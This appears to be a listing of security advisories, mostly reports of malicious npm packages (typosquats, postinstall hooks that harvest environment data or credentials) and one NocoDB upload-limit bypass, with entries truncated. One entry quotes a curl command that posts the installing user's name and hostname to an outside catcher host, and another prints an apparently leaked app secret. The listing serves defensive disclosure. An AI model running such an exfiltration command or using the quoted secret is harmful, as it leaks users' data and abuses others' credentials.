NPM: NocoDB: Attachment Size Limit Bypass via Upload-by-URL

NPM: NocoDB: Attachment Size Limit Bypass via Upload-by-URL vulnerability discovered by ? in WordPress Npm nocodb versions = 0.301.3...

Malicious code in @jaggle/resizeobserves (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3fe4b050d79ecfc702c9222cf3347e49d4530efd23a2120ee040ef32e0a76e4f Package name impersonates the popular @juggle/resize-observer j→j substitution and pluralized 'resizeobserves' and the README is copied verbatim from...

Malicious code in @kyungseopk1m/holidays-kr (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f8538f74ec98ab5287a941ebac99e8624ba40d809edbc5b033da1150254d8215 On import/use, dist/cjs/index.js and dist/mjs/index.js call fetch against the hardcoded endpoint https://kdata.kxxseop.workers.dev with data sourced...

Malicious code in chai-as-tuned (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f7e00f81e117716cfd7fd3565cf8b04073cd494a6da2c23749669133806a7473 Package name chai-as-tuned impersonates chai-as-promised and ships a README copy-pasted from the unrelated pino project npm/CI badges point at...

Malicious code in veteran (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4 On npm install, the package's postinstall hook install.js, registered via package.json line 10 "postinstall": "node install.js" downloads a...

Malicious code in celonix-otp-react (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector df58532b5edb3f7a5ad9734a7f4fa46f062c0f220d578db42a223188d078d9bb The package presents itself as a React OTP component, but its only exported widget hardcodes a single Firebase Realtime Database URL...

Malicious code in @vino.tian/vibe-kanban (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7f1533bb7e55b1bcd10291aa9f19e2a5cbe5755a7a6a7343d38fbd3ff8064a1f This package is published as @vino.tian/vibe-kanban and copies its README, name, and feature description from BloopAI's legitimate vibe-kanban projec...

MAL-2026-4229 Malicious code in @luke-101141/nobody (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8 On require, index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$whoami/$hostname/", leaking the installing user'...

Malicious code in chai-as-afforded (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d40560dbe3485657e0bf84ae14fb2447ca17ec244adcaf5d2ecd14a1753697d4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious Package

Overview chai-as-afforded is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

MAL-2026-4222 Malicious code in chai-as-afforded (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d40560dbe3485657e0bf84ae14fb2447ca17ec244adcaf5d2ecd14a1753697d4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2026-4738 Malicious code in zest-product (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c9081ad708b658c1bd56299e401ca6a764cc9137d99573bc922d38a7381cc30d On npm install, postinstall.js collects host identity and environment data os.hostname, username, process.cwd, process.env values, plus shelled-out...

MAL-2026-4620 Malicious code in nikou-node (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d4634b70c99dd84c499d573350a00e86b09e8caaf34786d60b118ce12c64b426 utils/BotClient.js hardcodes a Feishu/Lark appId clia88b12e0b9b51013 and appSecret aBRv7CbiWuL7csrMavfLvc5sMW5B4Ky7 as default constructor values,...

Malicious code in http-uploader-dev (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 936024fb65d6ab06a1f01fcd765b534812efb873f076e81303d87c0b141bba2b package.json declares "preinstall": "bun run index.js", which on npm install invokes Bun to run index.js. index.js detects the host OS and shells out...

Malicious code in @amswf/huoke (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4ec868ff3c73d920bd9c3b66a0e725f2eaf427b83ade2ad0fae284be0386eff4 On npm install, this package's postinstall runs node bin/huoke.js install-skill, which enumerates /home/ for every system user, finds each user's...

MAL-2026-4361 Malicious code in @amswf/huoke (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4ec868ff3c73d920bd9c3b66a0e725f2eaf427b83ade2ad0fae284be0386eff4 On npm install, this package's postinstall runs node bin/huoke.js install-skill, which enumerates /home/ for every system user, finds each user's...

Malicious code in cerebrum-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e0ac38481a69f23f9170b098fcd48cd72b82edb969bdd44eb3aa5cc377a13a0d On npm install, the package's postinstall hook runs setup.js, which decodes an embedded base64 string into a tar.gz file at ../../../tempbundle.tar.g...

Malicious code in @gad360/apothem (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4f5e509ba6aa2f781391f03ff37ea8005440c1d1106391bdfa91abae06336ad3 The package's package.json declares a postinstall hook "postinstall": "node install.js" that runs install.js automatically on npm install. install.js...

MAL-2026-4391 Malicious code in @gad360/apothem (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4f5e509ba6aa2f781391f03ff37ea8005440c1d1106391bdfa91abae06336ad3 The package's package.json declares a postinstall hook "postinstall": "node install.js" that runs install.js automatically on npm install. install.js...

Malicious code in wallet-security-checker (npm)

A coordinated supply-chain attack comprising 10 npm packages published by maintainer ddjidd5640 [email protected] within a 48-hour window 2026-05-19T03:55Z – 2026-05-21T04:31Z. All packages masquerade as legitimate Web3/DeFi developer security tools MCP servers while silently exfiltrating...